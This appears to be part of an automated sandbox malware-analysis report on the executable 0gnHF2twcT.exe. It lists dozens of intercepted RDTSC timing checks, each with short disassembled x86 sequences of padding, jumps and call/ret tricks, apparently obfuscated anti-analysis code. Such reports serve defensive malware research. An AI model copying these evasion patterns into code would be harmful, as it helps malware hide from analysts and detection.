Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27C737 second address: 27C740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27C802 second address: 27C817 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F054911993Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27C9C2 second address: 27C9CC instructions: 0x00000000 rdtsc 0x00000002 js 00007F05491602DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27C9CC second address: 27C9E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0549119940h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27CA8A second address: 27CA90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27D6D6 second address: 27D6E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27D6E2 second address: 27D70C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F05491602E5h 0x0000000a popad 0x0000000b nop 0x0000000c mov esi, dword ptr [ebp+122D3A77h] 0x00000012 xchg eax, ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push esi 0x00000017 pop esi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27D70C second address: 27D711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27DC05 second address: 27DC89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a stc 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F05491602D8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 push eax 0x00000028 je 00007F05491602DCh 0x0000002e mov edi, dword ptr [ebp+122D3A77h] 0x00000034 pop esi 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push ecx 0x0000003a call 00007F05491602D8h 0x0000003f pop ecx 0x00000040 mov dword ptr [esp+04h], ecx 0x00000044 add dword ptr [esp+04h], 0000001Dh 0x0000004c inc ecx 0x0000004d push ecx 0x0000004e ret 0x0000004f pop ecx 0x00000050 ret 0x00000051 je 00007F05491602D6h 0x00000057 mov esi, dword ptr [ebp+122D2BC0h] 0x0000005d xchg eax, ebx 0x0000005e push ebx 0x0000005f push eax 0x00000060 push edx 0x00000061 jns 00007F05491602D6h 0x00000067 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27F706 second address: 27F70A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27F7B1 second address: 27F7B7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27F7B7 second address: 27F7BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27F7BD second address: 27F7C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 280280 second address: 280285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 281CBE second address: 281CC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 236940 second address: 23694B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 23694B second address: 236953 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 282312 second address: 282316 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 282BC2 second address: 282BC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2869CC second address: 2869D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 28901E second address: 289022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 289022 second address: 28902C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0549119936h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 289524 second address: 28952F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F05491602D6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 28B529 second address: 28B546 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0549119943h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 28B546 second address: 28B54B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 28C511 second address: 28C52B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0549119946h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 28C52B second address: 28C54E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 28C54E second address: 28C552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 28B793 second address: 28B79A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 28B79A second address: 28B79F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 28C552 second address: 28C56B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 28D6D9 second address: 28D6DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 28D6DE second address: 28D6F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05491602DFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 28E6B2 second address: 28E6B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 290595 second address: 2905AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F05491602DEh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 290666 second address: 29066A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 28F81B second address: 28F820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 28F820 second address: 28F827 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2945E6 second address: 29462F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 mov dword ptr [esp], eax 0x0000000b sub edi, 70349985h 0x00000011 push 00000000h 0x00000013 mov bx, di 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ebp 0x0000001b call 00007F05491602D8h 0x00000020 pop ebp 0x00000021 mov dword ptr [esp+04h], ebp 0x00000025 add dword ptr [esp+04h], 0000001Bh 0x0000002d inc ebp 0x0000002e push ebp 0x0000002f ret 0x00000030 pop ebp 0x00000031 ret 0x00000032 push eax 0x00000033 pushad 0x00000034 jbe 00007F05491602D8h 0x0000003a push ecx 0x0000003b pop ecx 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 29462F second address: 294633 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 294633 second address: 294637 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2938A6 second address: 2938AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 292840 second address: 292844 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 292844 second address: 29284A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2938AB second address: 2938D0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F05491602D8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007F05491602E4h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 29284A second address: 292850 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2938D0 second address: 2938ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F05491602E6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 291826 second address: 291830 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0549119936h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 292850 second address: 292854 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2947E1 second address: 2947E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 292854 second address: 2928CE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov bh, 49h 0x0000000d mov di, 46C2h 0x00000011 push dword ptr fs:[00000000h] 0x00000018 mov dword ptr [ebp+1246FF8Eh], eax 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 push 00000000h 0x00000027 push ecx 0x00000028 call 00007F05491602D8h 0x0000002d pop ecx 0x0000002e mov dword ptr [esp+04h], ecx 0x00000032 add dword ptr [esp+04h], 0000001Bh 0x0000003a inc ecx 0x0000003b push ecx 0x0000003c ret 0x0000003d pop ecx 0x0000003e ret 0x0000003f jnc 00007F05491602D7h 0x00000045 or bh, FFFFFF8Bh 0x00000048 mov eax, dword ptr [ebp+122D0095h] 0x0000004e movzx ebx, bx 0x00000051 push FFFFFFFFh 0x00000053 sbb di, A152h 0x00000058 call 00007F05491602DCh 0x0000005d cld 0x0000005e pop ebx 0x0000005f nop 0x00000060 push ecx 0x00000061 push eax 0x00000062 push edx 0x00000063 jns 00007F05491602D6h 0x00000069 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2928CE second address: 2928F4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0549119936h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0549119948h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2928F4 second address: 2928F9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 29488B second address: 294891 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 294891 second address: 294895 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2956B8 second address: 2956CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0549119941h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2956CD second address: 2956E0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F05491602D8h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 29671A second address: 296799 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007F0549119947h 0x0000000e popad 0x0000000f popad 0x00000010 nop 0x00000011 mov dword ptr [ebp+12468036h], edx 0x00000017 push 00000000h 0x00000019 jne 00007F0549119942h 0x0000001f jno 00007F0549119936h 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ebx 0x0000002a call 00007F0549119938h 0x0000002f pop ebx 0x00000030 mov dword ptr [esp+04h], ebx 0x00000034 add dword ptr [esp+04h], 0000001Dh 0x0000003c inc ebx 0x0000003d push ebx 0x0000003e ret 0x0000003f pop ebx 0x00000040 ret 0x00000041 mov ebx, 7640CD10h 0x00000046 xchg eax, esi 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a jmp 00007F054911993Ah 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 296799 second address: 29679E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 29679E second address: 2967CE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F0549119944h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push esi 0x00000010 pop esi 0x00000011 jmp 00007F054911993Fh 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2967CE second address: 2967D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2967D4 second address: 2967D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 297868 second address: 29786C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 29786C second address: 297876 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0549119936h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 296A65 second address: 296A6F instructions: 0x00000000 rdtsc 0x00000002 js 00007F05491602D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 296A6F second address: 296A75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 296A75 second address: 296A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 298863 second address: 298868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2979E6 second address: 2979EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2979EB second address: 2979F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 297AC4 second address: 297AC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 297AC8 second address: 297ACC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 298A20 second address: 298A2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2A093C second address: 2A0942 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2A0942 second address: 2A0947 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2A0058 second address: 2A007F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0549119949h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007F0549119938h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2A007F second address: 2A0086 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2A0086 second address: 2A00A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F0549119944h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2A00A4 second address: 2A00F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05491602DBh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007F0549160306h 0x00000014 jmp 00007F05491602E7h 0x00000019 jmp 00007F05491602E9h 0x0000001e push esi 0x0000001f ja 00007F05491602D6h 0x00000025 pushad 0x00000026 popad 0x00000027 pop esi 0x00000028 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2A028F second address: 2A029E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007F0549119936h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2A029E second address: 2A02A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2A03DB second address: 2A03E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2A50FE second address: 2A512B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F05491602D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F05491602E5h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 pushad 0x00000015 push edi 0x00000016 push eax 0x00000017 pop eax 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2A512B second address: 2A512F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2A51FB second address: 2A5200 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2A5200 second address: 2A522C instructions: 0x00000000 rdtsc 0x00000002 je 00007F054911994Eh 0x00000008 jmp 00007F0549119948h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jg 00007F0549119936h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2A522C second address: 2A5237 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2A5237 second address: 2A5279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b jnp 00007F054911993Ch 0x00000011 pushad 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 jmp 00007F054911993Ah 0x00000019 popad 0x0000001a popad 0x0000001b mov eax, dword ptr [eax] 0x0000001d pushad 0x0000001e push edx 0x0000001f jmp 00007F0549119943h 0x00000024 pop edx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2A5279 second address: 2A527D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2AA58A second address: 2AA58F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2AA58F second address: 2AA5A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05491602DFh 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2AAB41 second address: 2AAB46 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
